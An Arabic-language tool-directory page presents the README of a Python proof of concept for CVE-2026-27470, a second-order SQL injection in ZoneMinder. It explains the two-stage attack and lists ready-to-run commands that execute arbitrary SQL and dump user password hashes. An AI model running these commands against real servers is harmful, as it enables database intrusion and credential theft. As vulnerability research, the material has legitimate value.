Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-27470-POC — # برهان إثبات المفهوم بلغة بايثون لـ CVE-2026-27470، حقن SQL من الدرجة الثانية بعد المصادقة في دالة getNearEvents() (status.php) في ZoneMinder، بدرجة CVSS 8.8 | Kitploit
أدوات/GitHubGitHub/d3vn0mi/cve-2026-27470-poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubd3vn0mi/cve-2026-27470-poc

CVE-2026-27470-POC

# برهان إثبات المفهوم بلغة بايثون لـ CVE-2026-27470، حقن SQL من الدرجة الثانية بعد المصادقة في دالة getNearEvents() (status.php) في ZoneMinder، بدرجة CVSS 8.8

عرض المستودع
منذ 5 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-27470 — استغلال حقن SQL من الدرجة الثانية في ZoneMinder

المؤلف: d3vn0mi | CVSS 8.8 | يتطلب مصادقة | يتطلب صلاحية الأحداث

نظرة عامة

CVE-2026-27470 هي ثغرة حقن SQL من الدرجة الثانية في ملف web/ajax/status.php الخاص بـ ZoneMinder — وتحديداً في الدالة getNearEvents().

التفاصيلالقيمة
الإصدارات المتأثرةZoneMinder <= 1.36.37 و 1.37.61 – 1.38.0
تم الإصلاح في1.36.38 / 1.38.1
النوعحقن SQL من الدرجة الثانية
المصادقة المطلوبةنعم (أي مستخدم لديه صلاحية الأحداث)
CVSS8.8 (عالية)

كيف تعمل الثغرة

الثغرة هي حقن SQL على مرحلتين (من الدرجة الثانية):

  1. المرحلة 1 — التخزين: يقوم المهاجم بإعادة تسمية حدث (أو تعديل حقل السبب الخاص به) ليتضمن حمولة SQL. يستخدم ZoneMinder استعلاماً معامَلاً لهذه العملية، لذا يتم تخزين الحمولة بأمان في قاعدة البيانات — لا يوجد جدار حماية للتطبيقات أو فلتر يحظرها.

  2. المرحلة 2 — التشغيل: يطلب المهاجم كيان nearevents عبر واجهة برمجة تطبيقات الحالة. تقوم الدالة getNearEvents() بقراءة اسم/سبب الحدث المخزن من قاعدة البيانات وتدمجه مباشرة في استعلام SQL جديد دون تعقيم، مما يؤدي إلى حقن SQL.

نظراً لأن ناقل الحقن (البيانات المخزنة) منفصل عن المشغّل (طلب GET نظيف)، فإن هذا يتجاوز معظم الحمايات على مستوى الإدخال.

التثبيت

root@kitploit:~
git clone https://github.com/d3vn0mi/CVE-2026-27470-POC.git
cd CVE-2026-27470-POC
pip install -r requirements.txt

الاستخدام

أساسي — استخراج إصدار قاعدة البيانات

root@kitploit:~
python3 poc.py -t http://10.10.10.10 -u admin -p password

استعلام SQL مخصص

root@kitploit:~
python3 poc.py -t http://10.10.10.10 -u admin -p password --query "SELECT user()"

تفريغ جميع المستخدمين وتجزئات كلمات المرور

root@kitploit:~
python3 poc.py -t http://10.10.10.10 -u admin -p password --dump-users

يتم حفظ بيانات الاعتماد في dumped_creds.txt افتراضياً.

حفظ النتائج في ملف مخصص

root@kitploit:~
python3 poc.py -t http://10.10.10.10 -u admin -p password --dump-users -o loot.txt
python3 poc.py -t http://10.10.10.10 -u admin -p password --query "SELECT @@datadir" -o result.txt

التوجيه عبر وكيل (Burp / mitmproxy)

root@kitploit:~
python3 poc.py -t http://10.10.10.10 -u admin -p password --proxy http://127.0.0.1:8080

استخدام حقل السبب بدلاً من الاسم

root@kitploit:~
python3 poc.py -t http://10.10.10.10 -u admin -p password --field Cause --query "SELECT database()"

تحديد معرف حدث يدوياً

root@kitploit:~
python3 poc.py -t http://10.10.10.10 -u admin -p password --event-id 42

إخراج مفصّل / تصحيح الأخطاء

root@kitploit:~
python3 poc.py -t http://10.10.10.10 -u admin -p password -v

الخيارات

العلمالوصفالافتراضي
-t, --targetعنوان URL الهدف(مطلوب)
-u, --usernameاسم مستخدم ZoneMinder(مطلوب)
-p, --passwordكلمة مرور ZoneMinder(مطلوب)
--queryاستعلام SQL للتنفيذSELECT VERSION()
--dump-usersتفريغ جميع أسماء المستخدمين وتجزئات كلمات المرور
-o, --outputحفظ النتائج في ملفdumped_creds.txt
--event-idمعرف الحدث لاستخدامه كناقل للحقن(اكتشاف تلقائي)
--fieldحقل الحقن: Name أو CauseName
--no-restoreعدم استعادة اسم الحدث بعد الاستغلال
--proxyعنوان URL للوكيل HTTP
--timeoutمهلة الطلب بالثواني30
-v, --verboseتفعيل تسجيل التصحيح

إخلاء المسؤولية

هذه الأداة مقدمة لأغراض البحث الأمني التعليمي والمصرح به فقط. لا تستخدمها ضد أنظمة لا تملكها أو ليس لديك إذن كتابي صريح لاختبارها. المؤلفون غير مسؤولين عن أي إساءة استخدام أو ضرر ناتج عن هذه الأداة.

المراجع

  • الموقع الرسمي لـ ZoneMinder
  • مستودع ZoneMinder على GitHub
تنزيل الأداة